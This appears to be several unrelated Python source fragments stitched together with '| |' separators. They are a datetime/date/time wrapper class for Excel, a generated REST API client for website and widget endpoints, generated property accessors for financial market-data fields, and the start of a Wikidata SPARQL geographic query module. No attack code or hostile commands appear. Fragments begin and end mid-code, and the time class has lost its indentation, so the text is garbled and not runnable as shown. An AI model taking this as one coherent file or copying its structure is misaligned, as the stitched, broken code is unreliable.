                                  ('tzinfo', DEFAULT_DT.tzinfo), ('fold', DEFAULT_DT.fold)])

    def __new__(cls, dt=None, *args, str_format=None, formats=None, **kwargs):
        """Create the datetime object.

        Args:
            dt (int/float/str/datetime): Datetime, str datetime, timestamp, or year positional argument.
            *args (tuple): Positional datetime arguments.
            str_format (str)[None]: String format to convert the object to a string with.
            formats (list)[None]: List of string formats to parse and decode information with.
            **kwargs (dict): Dictionary of datetime keyword arguments.
        """
        # Get the parameters and their defaults
        params = cls.get_params(cls.DEFAULT_PARAMS, dt, args, kwargs, formats)

        # Create this object type.  dt_module.datetime is immutable, so all
        # field values must be supplied here rather than in __init__.
        dt = super().__new__(cls, **params)
        dt.str_format, dt.formats = dt.get_init_formats(str_format, formats)
        return dt  # Return will run __init__

    def __init__(self, dt=None, *args, str_format=None, formats=None, **kwargs):
        """Initialize the datetime object.

        Args:
            dt (int/float/str/datetime): Datetime, str datetime, timestamp, or year positional argument.
            *args (tuple): Positional datetime arguments.
            str_format (str)[None]: String format to convert the object to a string with.
            formats (list)[None]: List of string formats to parse and decode information with.
            **kwargs (dict): Dictionary of datetime keyword arguments.
        """
        # All construction work already happened in __new__.
        super().__init__()

    def __str__(self):
        return str_datetime(self, self.str_format or self.formats)
class date(datetime):  # (dt_module.date, DtMixin): # excel cannot use date use datetime with different format.
    """Date wrapper.

    Implemented as a subclass of the ``datetime`` wrapper (not
    ``dt_module.date``) because an Excel cell cannot hold a bare date; only
    the default output format differs.
    """
    formats = DATETIME_FORMATS
    str_format = DATE_FORMATS[0]
    DEFAULT_PARAMS = OrderedDict([('year', DEFAULT_DT.year), ('month', DEFAULT_DT.month), ('day', DEFAULT_DT.day)])

    def __new__(cls, dt=None, *args, str_format=None, formats=None, **kwargs):
        """Create the date object.

        Args:
            dt (int/float/str/datetime): date, str date, timestamp, or year positional argument.
            *args (tuple): Positional date arguments.
            str_format (str)[None]: String format to convert the object to a string with.
            formats (list)[None]: List of string formats to parse and decode information with.
            **kwargs (dict): Dictionary of date keyword arguments.
        """
        # Get the parameters and their defaults.  *formats* is passed through
        # so string parsing honors caller-supplied formats — consistent with
        # datetime.__new__ (previously it was silently dropped here).
        params = cls.get_params(cls.DEFAULT_PARAMS, dt, args, kwargs, formats)

        # Create this object type
        dt = super().__new__(cls, **params)
        dt.str_format, dt.formats = dt.get_init_formats(str_format, formats)
        return dt  # Return will run __init__

    def __init__(self, dt=None, *args, str_format=None, formats=None, **kwargs):
        """Initialize the date object.

        Args:
            dt (int/float/str/datetime): date, str date, timestamp, or year positional argument.
            *args (tuple): Positional date arguments.
            str_format (str)[None]: String format to convert the object to a string with.
            formats (list)[None]: List of string formats to parse and decode information with.
            **kwargs (dict): Dictionary of date keyword arguments.
        """
        # All construction work already happened in __new__.
        super().__init__()

    def __str__(self):
        return str_datetime(self, self.str_format or self.formats)
class time(dt_module.time, DtMixin):
formats = TIME_FORMATS
str_format = TIME_FORMATS[0]
DEFAULT_PARAMS = OrderedDict([('hour', DEFAULT_DT.hour), ('minute', DEFAULT_DT.minute),
('second', DEFAULT_DT.second), ('microsecond', DEFAULT_DT.microsecond)])
def __new__(cls, dt=None, *args, str_format=None, formats=None, **kwargs):
"""Create the time object.
Args:
dt (int/float/str/datetime): time, str time, timestamp, or hour positional argument.
*args (tuple): Positional time arguments.
str_format (str)[None]: String format to convert the object to a string with.
formats (list)[None]: List of string formats to parse and decode information with.
**kwargs (dict): Dictionary of time keyword arguments.
"""
# Get the parameters and their defaults
params = cls.get_params(cls.DEFAULT_PARAMS, dt, args, kwargs)
# Create this object type
dt = super().__new__(cls, **params)
dt.str_format, dt.formats = dt.get_init_formats(str_format, formats)
return dt # Return will run __init__
def __init__(self, dt=None, *args, str_format=None, formats=None, **kwargs):
"""Initialize the time object.
Args:
dt (int/float/str/datetime): time, str time, timestamp, or hour positional argument.
*args (tuple): Positional time arguments.
str_format (str)[None]: String format to convert the object to a string with.
formats | |
# noqa: E501
return self.api_client.call_api(
'/website/websites', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebsitePaginationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_website_property_list_by_website_id(self, id, **kwargs):  # noqa: E501
    """get a list of properties for a website  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_website_property_list_by_website_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param str fields:
    :param int size:
    :param int offset:
    :param str filter:
    :return: PropertyPaginationResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper always receive the payload only, never the
    # full (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    delegate = self.get_website_property_list_by_website_id_with_http_info
    if kwargs.get('async_req'):
        # Async: the caller receives the request thread.
        return delegate(id, **kwargs)
    # Sync: the *_with_http_info call already returns only the data.
    return delegate(id, **kwargs)
def get_website_property_list_by_website_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """get a list of properties for a website  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_website_property_list_by_website_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param str fields:
    :param int size:
    :param int offset:
    :param str filter:
    :return: PropertyPaginationResponse
             If the method is called asynchronously,
             returns the request thread.
    """

    # Endpoint parameters plus the client-level control knobs.
    all_params = ['id', 'fields', 'size', 'offset', 'filter']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # dict.items() replaces six.iteritems — works on Python 2 and 3 alike.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_website_property_list_by_website_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_website_property_list_by_website_id`")  # noqa: E501

    # Raw strings avoid the invalid '\d' escape warning; the pattern and the
    # message text are unchanged.
    if 'id' in params and not re.search(r'\d+', params['id'] if type(params['id']) is str else str(params['id'])):  # noqa: E501
        raise ValueError(r"Invalid value for parameter `id` when calling `get_website_property_list_by_website_id`, must conform to the pattern `/\d+/`")  # noqa: E501
    collection_formats = {}

    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501
    if 'size' in params:
        query_params.append(('size', params['size']))  # noqa: E501
    if 'offset' in params:
        query_params.append(('offset', params['offset']))  # noqa: E501
    if 'filter' in params:
        query_params.append(('filter', params['filter']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['LMv1']  # noqa: E501

    return self.api_client.call_api(
        '/website/websites/{id}/properties', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='PropertyPaginationResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_website_sdt_list_by_website_id(self, id, **kwargs):  # noqa: E501
    """get a list of SDTs for a website  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response data.
    >>> thread = api.get_website_sdt_list_by_website_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param str fields:
    :param int size:
    :param int offset:
    :param str filter:
    :return: SDTPaginationResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper always want just the payload,
    # never the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous mode: hand back the request thread immediately.
        return self.get_website_sdt_list_by_website_id_with_http_info(id, **kwargs)  # noqa: E501
    # Synchronous mode: block and return the response body.
    return self.get_website_sdt_list_by_website_id_with_http_info(id, **kwargs)  # noqa: E501
def get_website_sdt_list_by_website_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """get a list of SDTs for a website  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_website_sdt_list_by_website_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param str fields:
    :param int size:
    :param int offset:
    :param str filter:
    :return: SDTPaginationResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands; anything else is a
    # caller bug and is rejected below.
    all_params = ['id', 'fields', 'size', 'offset', 'filter']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # dict.items() replaces six.iteritems: it behaves identically for this
    # read-only iteration on both Python 2 and 3 and drops the third-party
    # six dependency from this method.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_website_sdt_list_by_website_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_website_sdt_list_by_website_id`")  # noqa: E501
    # Raw string avoids the invalid-escape warning raised for '\d' in a
    # plain literal on modern Python.  NOTE(review): re.search only needs
    # one digit anywhere in the value; a full match may be the intent of
    # the `/\d+/` pattern -- confirm before tightening.
    if 'id' in params and not re.search(r'\d+', params['id'] if type(params['id']) is str else str(params['id'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `id` when calling `get_website_sdt_list_by_website_id`, must conform to the pattern `/\\d+/`")  # noqa: E501

    collection_formats = {}

    # `id` is interpolated into the URL path; the remaining optional
    # parameters travel in the query string.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501
    if 'size' in params:
        query_params.append(('size', params['size']))  # noqa: E501
    if 'offset' in params:
        query_params.append(('offset', params['offset']))  # noqa: E501
    if 'filter' in params:
        query_params.append(('filter', params['filter']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['LMv1']  # noqa: E501

    return self.api_client.call_api(
        '/website/websites/{id}/sdts', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SDTPaginationResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_widget_by_id(self, id, **kwargs):  # noqa: E501
    """get widget by id  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response data.
    >>> thread = api.get_widget_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param str fields:
    :return: Widget
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper always want just the payload,
    # never the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous mode: hand back the request thread immediately.
        return self.get_widget_by_id_with_http_info(id, **kwargs)  # noqa: E501
    # Synchronous mode: block and return the response body.
    return self.get_widget_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_widget_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """get widget by id  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_widget_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param str fields:
    :return: Widget
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands; anything else is a
    # caller bug and is rejected below.
    all_params = ['id', 'fields']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # dict.items() replaces six.iteritems: it behaves identically for this
    # read-only iteration on both Python 2 and 3 and drops the third-party
    # six dependency from this method.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_widget_by_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_widget_by_id`")  # noqa: E501
    # Raw string avoids the invalid-escape warning raised for '\d' in a
    # plain literal on modern Python.  NOTE(review): re.search only needs
    # one digit anywhere in the value; a full match may be the intent of
    # the `/\d+/` pattern -- confirm before tightening.
    if 'id' in params and not re.search(r'\d+', params['id'] if type(params['id']) is str else str(params['id'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `id` when calling `get_widget_by_id`, must conform to the pattern `/\\d+/`")  # noqa: E501

    collection_formats = {}

    # `id` is interpolated into the URL path; `fields` travels in the
    # query string.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['LMv1']  # noqa: E501

    return self.api_client.call_api(
        '/dashboard/widgets/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Widget',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_widget_data_by_id(self, id, **kwargs):  # noqa: E501
    """get widget data  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response data.
    >>> thread = api.get_widget_data_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: (required)
    :param int start:
    :param int end:
    :param str format:
    :return: WidgetData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper always want just the payload,
    # never the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous mode: hand back the request thread immediately.
        return self.get_widget_data_by_id_with_http_info(id, **kwargs)  # noqa: E501
    # Synchronous mode: block and return the response body.
    return self.get_widget_data_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_widget_data_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""get widget data # noqa: E501
# noqa: E501
This method makes | |
kwargs.get('lendingFundAcct')
self.__reportId = kwargs.get('reportId')
self.__indexWeight = kwargs.get('indexWeight')
self.__MACSPrimaryAssetClass = kwargs.get('MACSPrimaryAssetClass')
self.__rebate = kwargs.get('rebate')
self.__flagship = kwargs.get('flagship')
self.__trader = kwargs.get('trader')
self.__additionalPriceNotation = kwargs.get('additionalPriceNotation')
self.__factorCategory = kwargs.get('factorCategory')
self.__impliedVolatility = kwargs.get('impliedVolatility')
self.__spread = kwargs.get('spread')
self.__stsRatesMaturity = kwargs.get('stsRatesMaturity')
self.__equityDelta = kwargs.get('equityDelta')
self.__grossWeight = kwargs.get('grossWeight')
self.__listed = kwargs.get('listed')
self.__variance = kwargs.get('variance')
self.__tcmCostHorizon6Hour = kwargs.get('tcmCostHorizon6Hour')
self.__g10Currency = kwargs.get('g10Currency')
self.__shockStyle = kwargs.get('shockStyle')
self.__relativePeriod = kwargs.get('relativePeriod')
self.__isin = kwargs.get('isin')
self.__methodology = kwargs.get('methodology')
# ---------------------------------------------------------------------------
# Generated accessor pairs for Marquee market-data fields.  Each property
# reads the name-mangled backing attribute assigned in __init__, and each
# setter first stores the new value and then calls
# self._property_changed('<field>') -- presumably notifying observers after
# the assignment has taken effect (confirm against the base class).
# ---------------------------------------------------------------------------
@property
def queueClockTimeLabel(self):
    """Label of the Stock's Queue Clock Time on the particular date."""
    # NOTE(review): no annotation in source; value type unknown from here.
    return self.__queueClockTimeLabel

@queueClockTimeLabel.setter
def queueClockTimeLabel(self, value) -> None:
    self.__queueClockTimeLabel = value
    self._property_changed('queueClockTimeLabel')

@property
def marketPnl(self) -> float:
    """Market Profit and Loss (PNL)."""
    return self.__marketPnl

@marketPnl.setter
def marketPnl(self, value: float) -> None:
    self.__marketPnl = value
    self._property_changed('marketPnl')

@property
def year(self) -> str:
    """Year of forecast."""
    return self.__year

@year.setter
def year(self, value: str) -> None:
    self.__year = value
    self._property_changed('year')

@property
def sustainAsiaExJapan(self) -> bool:
    """True if the stock is on the SUSTAIN Asia Ex Japan list as of the corresponding date. False if the stock is removed from the SUSTAIN Asia Ex Japan list on the corresponding date."""
    return self.__sustainAsiaExJapan

@sustainAsiaExJapan.setter
def sustainAsiaExJapan(self, value: bool) -> None:
    self.__sustainAsiaExJapan = value
    self._property_changed('sustainAsiaExJapan')

@property
def investmentRate(self) -> float:
    """The rate of return on an investment. In the context of securities lending, it is the rate being earned on the reinvested collateral received from the borrower."""
    return self.__investmentRate

@investmentRate.setter
def investmentRate(self, value: float) -> None:
    self.__investmentRate = value
    self._property_changed('investmentRate')

@property
def assetClassificationsGicsSubIndustry(self) -> str:
    """GICS Sub Industry classification (level 4)."""
    return self.__assetClassificationsGicsSubIndustry

@assetClassificationsGicsSubIndustry.setter
def assetClassificationsGicsSubIndustry(self, value: str) -> None:
    self.__assetClassificationsGicsSubIndustry = value
    self._property_changed('assetClassificationsGicsSubIndustry')

@property
def mdapiClass(self) -> str:
    """MDAPI Asset Class."""
    return self.__mdapiClass

@mdapiClass.setter
def mdapiClass(self, value: str) -> None:
    self.__mdapiClass = value
    self._property_changed('mdapiClass')

@property
def bidUnadjusted(self) -> float:
    """Unadjusted bid level of an asset based on official exchange fixing or calculation agent marked level."""
    return self.__bidUnadjusted

@bidUnadjusted.setter
def bidUnadjusted(self, value: float) -> None:
    self.__bidUnadjusted = value
    self._property_changed('bidUnadjusted')

@property
def economicTermsHash(self) -> str:
    """Hash code for an asset."""
    return self.__economicTermsHash

@economicTermsHash.setter
def economicTermsHash(self, value: str) -> None:
    self.__economicTermsHash = value
    self._property_changed('economicTermsHash')

@property
def neighbourAssetId(self) -> str:
    """Marquee identifier for the corresponding neighbour."""
    return self.__neighbourAssetId

@neighbourAssetId.setter
def neighbourAssetId(self, value: str) -> None:
    self.__neighbourAssetId = value
    self._property_changed('neighbourAssetId')

@property
def simonIntlAssetTags(self) -> Tuple[str, ...]:
    """SIMON International Asset Tags."""
    return self.__simonIntlAssetTags

@simonIntlAssetTags.setter
def simonIntlAssetTags(self, value: Tuple[str, ...]) -> None:
    self.__simonIntlAssetTags = value
    self._property_changed('simonIntlAssetTags')

@property
def path(self) -> str:
    """Path to value."""
    return self.__path

@path.setter
def path(self, value: str) -> None:
    self.__path = value
    self._property_changed('path')

@property
def availableInventory(self) -> float:
    """An estimated indication of the share quantity potentially available to borrow in the relevant asset."""
    return self.__availableInventory

@availableInventory.setter
def availableInventory(self, value: float) -> None:
    self.__availableInventory = value
    self._property_changed('availableInventory')

@property
def clientContact(self) -> str:
    """Name of client(s) requesting data."""
    return self.__clientContact

@clientContact.setter
def clientContact(self, value: str) -> None:
    self.__clientContact = value
    self._property_changed('clientContact')

@property
def est1DayCompletePct(self) -> float:
    """Estimated 1 day completion percentage."""
    return self.__est1DayCompletePct

@est1DayCompletePct.setter
def est1DayCompletePct(self, value: float) -> None:
    self.__est1DayCompletePct = value
    self._property_changed('est1DayCompletePct')

@property
def rank(self) -> float:
    """Rank to determine most relevant asset."""
    return self.__rank

@rank.setter
def rank(self, value: float) -> None:
    self.__rank = value
    self._property_changed('rank')

@property
def mixedSwapOtherReportedSDR(self) -> str:
    """Indicates the other SDR to which a mixed swap is reported."""
    return self.__mixedSwapOtherReportedSDR

@mixedSwapOtherReportedSDR.setter
def mixedSwapOtherReportedSDR(self, value: str) -> None:
    self.__mixedSwapOtherReportedSDR = value
    self._property_changed('mixedSwapOtherReportedSDR')

@property
def dataSetCategory(self) -> str:
    """Top level grouping of dataset."""
    return self.__dataSetCategory

@dataSetCategory.setter
def dataSetCategory(self, value: str) -> None:
    self.__dataSetCategory = value
    self._property_changed('dataSetCategory')

@property
def createdById(self) -> str:
    """Unique identifier of user who created the object"""
    return self.__createdById

@createdById.setter
def createdById(self, value: str) -> None:
    self.__createdById = value
    self._property_changed('createdById')

@property
def vehicleType(self) -> str:
    """Type of investment vehicle. Only viewable after having been granted additional access to asset information."""
    return self.__vehicleType

@vehicleType.setter
def vehicleType(self, value: str) -> None:
    self.__vehicleType = value
    self._property_changed('vehicleType')

@property
def dailyRisk(self) -> float:
    """Daily Risk Value."""
    return self.__dailyRisk

@dailyRisk.setter
def dailyRisk(self, value: float) -> None:
    self.__dailyRisk = value
    self._property_changed('dailyRisk')

@property
def bosInBpsLabel(self):
    """Label of the Stock's Bid-Offer Spread in Basis points on the particular date."""
    # NOTE(review): no annotation in source; value type unknown from here.
    return self.__bosInBpsLabel

@bosInBpsLabel.setter
def bosInBpsLabel(self, value) -> None:
    self.__bosInBpsLabel = value
    self._property_changed('bosInBpsLabel')

@property
def energy(self) -> float:
    """Energy price component."""
    return self.__energy

@energy.setter
def energy(self, value: float) -> None:
    self.__energy = value
    self._property_changed('energy')

@property
def marketDataType(self) -> str:
    """The market data type (e.g. IR_BASIS, FX_Vol). This can be resolved into a dataset when combined with vendor and intraday=true/false."""
    return self.__marketDataType

@marketDataType.setter
def marketDataType(self, value: str) -> None:
    self.__marketDataType = value
    self._property_changed('marketDataType')

@property
def sentimentScore(self) -> float:
    """A value representing a sentiment indicator."""
    return self.__sentimentScore

@sentimentScore.setter
def sentimentScore(self, value: float) -> None:
    self.__sentimentScore = value
    self._property_changed('sentimentScore')

@property
def bosInBps(self) -> float:
    """The Bid-Offer Spread of the stock in Basis points on the particular date."""
    return self.__bosInBps

@bosInBps.setter
def bosInBps(self, value: float) -> None:
    self.__bosInBps = value
    self._property_changed('bosInBps')

@property
def pointClass(self) -> str:
    """MDAPI Class."""
    return self.__pointClass

@pointClass.setter
def pointClass(self, value: str) -> None:
    self.__pointClass = value
    self._property_changed('pointClass')

@property
def fxSpot(self) -> float:
    """FX spot rate as determined by fixing source."""
    return self.__fxSpot

@fxSpot.setter
def fxSpot(self, value: float) -> None:
    self.__fxSpot = value
    self._property_changed('fxSpot')

@property
def bidLow(self) -> float:
    """Lowest Bid Price (price willing to buy)."""
    return self.__bidLow

@bidLow.setter
def bidLow(self, value: float) -> None:
    self.__bidLow = value
    self._property_changed('bidLow')

@property
def valuePrevious(self) -> str:
    """Value for the previous period after the revision (if revision is applicable)."""
    return self.__valuePrevious

@valuePrevious.setter
def valuePrevious(self, value: str) -> None:
    self.__valuePrevious = value
    self._property_changed('valuePrevious')

@property
def fairVarianceVolatility(self) -> float:
    """The strike in volatility terms, calculated as square root of fair variance."""
    return self.__fairVarianceVolatility

@fairVarianceVolatility.setter
def fairVarianceVolatility(self, value: float) -> None:
    self.__fairVarianceVolatility = value
    self._property_changed('fairVarianceVolatility')

@property
def avgTradeRate(self) -> float:
    """The Average Trading Rate of the stock on the particular date."""
    return self.__avgTradeRate

@avgTradeRate.setter
def avgTradeRate(self, value: float) -> None:
    self.__avgTradeRate = value
    self._property_changed('avgTradeRate')

@property
def shortLevel(self) -> float:
    """Level of the 5-day normalized flow for short selling/covering."""
    return self.__shortLevel

@shortLevel.setter
def shortLevel(self, value: float) -> None:
    self.__shortLevel = value
    self._property_changed('shortLevel')

@property
def hedgeVolatility(self) -> float:
    """Standard deviation of the annualized returns."""
    return self.__hedgeVolatility

@hedgeVolatility.setter
def hedgeVolatility(self, value: float) -> None:
    self.__hedgeVolatility = value
    self._property_changed('hedgeVolatility')

@property
def version(self) -> float:
    """Version number."""
    return self.__version

@version.setter
def version(self, value: float) -> None:
    self.__version = value
    self._property_changed('version')

@property
def tags(self) -> Tuple[str, ...]:
    """Metadata associated with the object"""
    return self.__tags

@tags.setter
def tags(self, value: Tuple[str, ...]) -> None:
    self.__tags = value
    self._property_changed('tags')

@property
def underlyingAssetId(self) -> str:
    """Marquee identifier for constituents of an index or portfolio."""
    return self.__underlyingAssetId

@underlyingAssetId.setter
def underlyingAssetId(self, value: str) -> None:
    self.__underlyingAssetId = value
    self._property_changed('underlyingAssetId')

@property
def clientExposure(self) -> float:
    """Exposure of client positions to the factor in percent of equity."""
    return self.__clientExposure

@clientExposure.setter
def clientExposure(self, value: float) -> None:
    self.__clientExposure = value
    self._property_changed('clientExposure')

@property
def correlation(self) -> float:
    """Market implied correlation between two tenors."""
    return self.__correlation

@correlation.setter
def correlation(self, value: float) -> None:
    self.__correlation = value
    self._property_changed('correlation')

@property
def exposure(self) -> float:
    """Exposure of a given asset or portfolio in the denominated currency of the asset or portfolio."""
    return self.__exposure

@exposure.setter
def exposure(self, value: float) -> None:
    self.__exposure = value
    self._property_changed('exposure')

@property
def gsSustainSubSector(self) -> str:
    """GS SUSTAIN sector."""
    return self.__gsSustainSubSector

@gsSustainSubSector.setter
def gsSustainSubSector(self, value: str) -> None:
    self.__gsSustainSubSector = value
    self._property_changed('gsSustainSubSector')

@property
def domain(self) -> str:
    """Domain that request came from."""
    return self.__domain

@domain.setter
def domain(self, value: str) -> None:
    self.__domain = value
    self._property_changed('domain')

@property
def marketDataAsset(self) -> str:
    """The market data asset (e.g. USD, USD/EUR)."""
    return self.__marketDataAsset

@marketDataAsset.setter
def marketDataAsset(self, value: str) -> None:
    self.__marketDataAsset = value
    self._property_changed('marketDataAsset')

@property
def forwardTenor(self) -> str:
    """Start of swap after option expiry."""
    return self.__forwardTenor

@forwardTenor.setter
def forwardTenor(self, value: str) -> None:
    self.__forwardTenor = value
    self._property_changed('forwardTenor')

@property
def unadjustedHigh(self) -> float:
    """Unadjusted high level of an asset based on official exchange fixing or calculation agent marked level."""
    return self.__unadjustedHigh

@unadjustedHigh.setter
def unadjustedHigh(self, value: float) -> None:
    self.__unadjustedHigh = value
    self._property_changed('unadjustedHigh')

@property
def sourceImportance(self) -> float:
    """Source importance."""
    return self.__sourceImportance

@sourceImportance.setter
def sourceImportance(self, value: float) -> None:
    self.__sourceImportance = value
    self._property_changed('sourceImportance')

@property
def eid(self) -> str:
    """Goldman Sachs internal exchange identifier."""
    return self.__eid

@eid.setter
def eid(self, value: str) -> None:
    self.__eid = value
    self._property_changed('eid')
@property
def jsn(self) -> str:
"""Japan security number | |
<gh_stars>1-10
# coding=utf-8
# Copyright 2020 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Library to support Wikidata geographic queries from https://query.wikidata.org/sparql.'''
from typing import Dict, Tuple, Sequence, Text, Any, List
import sys
import pandas as pd
from shapely.geometry.point import Point
from SPARQLWrapper import SPARQLWrapper, JSON
from cabby.geo import util
from cabby.geo.regions import Region
def create_info_query_from_region(region: Region) -> str:
  """Build the extensive-info SPARQL query for a region's bounding box."""
  return create_info_query(region.corner_sw, region.corner_ne)
def create_info_query(corner_west: Point, corner_east: Point) -> str:
  """Build a SPARQL query returning rich place info inside a bounding box.

  The wikibase:box service restricts hits to the rectangle spanned by the
  two corner points; only the corners are interpolated via f-strings, the
  rest of the query text is fixed.
  """
  return """
SELECT ?place ?placeLabel
?placeDescription ?architecturalStyleLabel ?subsidiaryLabel
?useLabel ?hasPartLabel
( GROUP_CONCAT ( DISTINCT ?altLabel; separator="; " ) AS ?altLabelList )
( GROUP_CONCAT ( DISTINCT ?instanceLabel; separator="; " ) AS ?instance )
(GROUP_CONCAT(DISTINCT?location;separator=", ") AS ?point)
WHERE
{
{
?place wdt:P31 ?instance.
?wikipediaUrl schema:about ?place.
OPTIONAL {?place wdt:P527 ?hasPart}.
OPTIONAL {?place wdt:P366 ?use}.
OPTIONAL {?place wdt:P355 ?subsidiary}.
OPTIONAL {?place wdt:P149 ?architecturalStyle}.
OPTIONAL { ?place skos:altLabel ?altLabel . FILTER (lang(?altLabel) = "en") }
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
SERVICE wikibase:label { bd:serviceParam wikibase:language "[AUTO_LANGUAGE],en". }
?instance rdfs:label ?instanceLabel. filter(lang(?instanceLabel) = "en").
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
}
FILTER (?instance not in
